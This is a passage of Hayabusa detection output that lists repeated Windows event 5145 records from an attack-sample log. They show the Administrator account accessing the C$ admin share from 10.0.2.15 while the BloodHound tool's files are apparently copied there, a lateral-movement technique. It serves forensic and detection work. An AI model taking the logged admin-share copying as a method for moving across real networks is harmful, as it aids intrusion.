Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\listenercount | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\listenercount\test | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\locate-path | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\lodash | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.968 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\lodash\fp | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.978 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\loose-envify | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\make-dir | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\md5-file | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimatch | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.998 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist\example | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.998 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist\test | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\test | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\dojo | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\jquery | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\mootools | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\qooxdoo | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\yui3 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib\browser | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib\v1 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\types | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\types\v1 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\node-ratify | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\object-assign | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\once | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib\zlib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\path-exists | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\path-is-absolute | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pify | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pkg-up | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-limit | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-locate | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\types | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\process-nextick-args | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\prop-types | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\prop-types\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-try | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\punycode | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator 